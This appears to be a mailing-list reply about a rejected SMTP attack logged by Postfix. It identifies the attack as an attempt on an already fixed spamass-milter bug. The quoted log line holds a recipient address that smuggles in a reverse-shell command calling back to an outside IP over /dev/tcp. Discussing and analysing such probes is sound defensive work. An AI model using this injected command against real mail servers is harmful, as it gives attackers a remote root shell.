Am 12.02.2011 22:53, schrieb Bob Proulx: > A friend's Mac running Postfix logged this rejected attack: > > Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT from > unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command rejected: need > fully-qualified hostname; from=<b...@dick.com> to=<root+:|exec /bin/sh > 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0> proto=SMTP helo=<bluedick> > > Of course this particular message was blocked at the HELO stage. But > I was curious as to what attack vector this was trying to exploit and > against what mail transport agent? I searched the web quite a bit and > didn't see this particular attack discussed anywhere. > > Obviously the /dev/tcp/host/port part is trying to connect back to a > C&C host and attach the network connection to a root shell. I > understand the shell scripting part of the attack fine. > > The remote mta security exploit I couldn't locate references to was > the "to=<root+:|exec /bin/sh ..." part of the attack. What mta is > vulnerable to "+:|" in the To address? Or perhaps none are and this > is simply a failed probe attempt? > > Thanks, > Bob
looks like trying allready fixed bug on spamass-milter http://savannah.nongnu.org/bugs/?29136 -- Best Regards MfG Robert Schetterer Germany/Munich/Bavaria
